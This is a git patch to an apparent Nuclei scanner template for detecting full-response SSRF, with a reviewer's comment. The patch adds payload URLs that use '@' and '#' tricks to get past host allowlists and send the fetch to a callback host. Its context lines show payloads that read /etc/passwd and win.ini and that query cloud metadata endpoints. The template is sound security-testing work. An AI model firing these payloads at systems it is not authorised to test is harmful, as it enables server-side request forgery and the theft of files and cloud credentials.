From 2cba2ac444890268ccc6d99030a5ccdde29e8289 Mon Sep 17 00:00:00 2001
From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
Date: Mon, 22 Jul 2024 16:19:11 +0330
Subject: [PATCH] Update response-ssrf.yaml
---
 dast/vulnerabilities/ssrf/response-ssrf.yaml | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/dast/vulnerabilities/ssrf/response-ssrf.yaml b/dast/vulnerabilities/ssrf/response-ssrf.yaml
index 1b6ab7b830..c2c4fc7e4c 100644
--- a/dast/vulnerabilities/ssrf/response-ssrf.yaml
+++ b/dast/vulnerabilities/ssrf/response-ssrf.yaml
@@ -2,7 +2,7 @@ id: response-ssrf
 info:
 name: Full Response SSRF Detection
- author: pdteam,pwnhxl,j4vaovo
+ author: pdteam,pwnhxl,j4vaovo,AmirHossein Raeisi
 severity: high
 reference:
 - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py
@@ -20,7 +20,11 @@ http:
 ssrf:
 - 'http://{{interactsh-url}}'
 - 'http://{{FQDN}}.{{interactsh-url}}'
+ - 'http://{{FQDN}}@{{interactsh-url}}'
+ - 'http://{{interactsh-url}}#{{FQDN}}'
 - 'http://{{RDN}}.{{interactsh-url}}'
+ - 'http://{{RDN}}@{{interactsh-url}}'
+ - 'http://{{interactsh-url}}#{{RDN}}'
 - 'file:////./etc/./passwd'
 - 'file:///c:/./windows/./win.ini'
 - 'http://metadata.tencentyun.com/latest/meta-data/'
@@ -128,4 +132,4 @@ http:
 part: body
 regex:
 - 'id[\s\S]+interfaces\/'
-# digest: 4a0a00473045022100df5e466f9b2de4655561801dacd8444d412cca9556662839a5955b6c360fe47e022070272a7069a37a5df17d1177769fa87a3c21dcf8b8898e2b36652602d64adc9c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100df5e466f9b2de4655561801dacd8444d412cca9556662839a5955b6c360fe47e022070272a7069a37a5df17d1177769fa87a3c21dcf8b8898e2b36652602d64adc9c:922c64590222798bb761d5b6d8e72950
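Review bot: The four payloads added to the `ssrf:` list in the second hunk carry no comment saying what they test, and they differ in kind from the subdomain forms around them: `{{FQDN}}@…` and `{{RDN}}@…` put the target's own host in the URL userinfo, and `…#{{FQDN}}` / `…#{{RDN}}` put it in the fragment, so the scanned application's allowlist check sees a trusted name while the fetch resolves the interactsh host. I would add a line above them such as `# userinfo (@) and fragment (#) forms: flag allowlist checks that only look for the original host somewhere in the URL string`. Whether a hit on these is reported depends on the matchers, which lie outside this hunk, so it is worth confirming that they key on the fetched response and not on the host portion of the payload. Separately, the `# digest:` value in the last hunk is unchanged although the template body changed, so the signature presumably has to be regenerated before the template verifies as signed.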